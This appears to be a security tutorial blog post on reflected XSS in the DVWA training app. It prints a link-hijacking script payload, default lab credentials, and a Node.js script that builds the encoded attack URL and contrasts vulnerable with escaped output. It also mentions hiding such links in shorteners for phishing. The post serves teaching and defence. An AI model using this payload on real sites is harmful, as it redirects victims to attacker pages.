XSS attack - reflected XSS attack hijacking the user's browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflected XSS payload that hijacks the links on the vulnerable page. The attack could be run directly inside DVWA, but we construct a slightly more elaborate setup for demonstration purposes.
<script>
// Payload from the post: runs once the page has finished loading
window.onload = function() {
    // every <a> element on the page (an HTMLCollection, indexed like an array)
    var link = document.getElementsByTagName("a");
    // overwrite each link's destination with the attacker's URL
    for (var j = 0; j < link.length; j++) {
        link[j].href = "http://www.baidu.com";
    }
}
</script>
JavaScript code analysis: window.onload runs the anonymous function once the web page has finished loading.
Functionality: document.getElementsByTagName("a") returns every <a> element on the page and stores the collection in link; the for loop then replaces the href of every element in that collection with the attacker's URL (http://www.baidu.com here, standing in for a malicious site), so every link the user clicks goes where the attacker wants.
Open the Chrome browser and test the effect on the DVWA reflected XSS page.
Log in at http://192.168.98.66/DVWA-master/login.php with user name admin and password password, then set the DVWA Security level to low.
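As an added example (not code from the original post), the following Node.js script builds the link a victim would have to open for the payload above, simulates how DVWA's low-level handler reflects the parameter back unescaped, and contrasts it with an HTML-entity-escaped reflection. It assumes the DVWA host from the post and the `name` query parameter that DVWA's reflected XSS page reads; the `renderLow` and `renderSafe` functions are simplified stand-ins for the server side, not DVWA's own PHP.

```javascript
// Added example: reflected XSS link construction and the escaping that defeats it.
// DVWA host taken from the post; the `name` parameter and the <pre>Hello ...</pre>
// reflection are assumptions about the DVWA xss_r page, not taken from the post.
const DVWA_BASE = "http://192.168.98.66/DVWA-master";

// The link-hijacking payload from the post, minified onto a single line.
const PAYLOAD =
  '<script>window.onload=function(){var link=document.getElementsByTagName("a");' +
  'for(var j=0;j<link.length;j++){link[j].href="http://www.baidu.com";}}</script>';

// The URL the victim must open: the payload travels in the `name` query parameter.
function buildAttackUrl(payload) {
  return `${DVWA_BASE}/vulnerabilities/xss_r/?name=${encodeURIComponent(payload)}`;
}

// What a server sees after URL decoding the query string.
function nameFromUrl(url) {
  return new URL(url).searchParams.get("name");
}

// Simulated "low" handler: the raw parameter is concatenated straight into HTML.
function renderLow(name) {
  return `<pre>Hello ${name}</pre>`;
}

// HTML-entity encoding of the five characters that matter in an HTML text context
// (the same transformation PHP's htmlspecialchars applies with ENT_QUOTES).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: the reflected value is escaped before it reaches the page.
function renderSafe(name) {
  return `<pre>Hello ${escapeHtml(name)}</pre>`;
}

// Crude check used for this demo: does the response still contain a script element?
function containsScript(html) {
  return /<script\b/i.test(html);
}

function demo() {
  const url = buildAttackUrl(PAYLOAD);
  const reflected = nameFromUrl(url);
  return {
    url,
    roundTrips: reflected === PAYLOAD,            // payload survives URL encode/decode
    lowIsVulnerable: containsScript(renderLow(reflected)),   // true: script is live
    safeIsVulnerable: containsScript(renderSafe(reflected)), // false: rendered as text
  };
}

console.log(demo());
```

The attack link is long and obviously contains `%3Cscript%3E`, which is why real phishing campaigns wrap such links in a shortener or an HTML e-mail; the escaped response shows the payload as literal text inside the <pre> block, which is the server-side fix DVWA applies at its higher security levels.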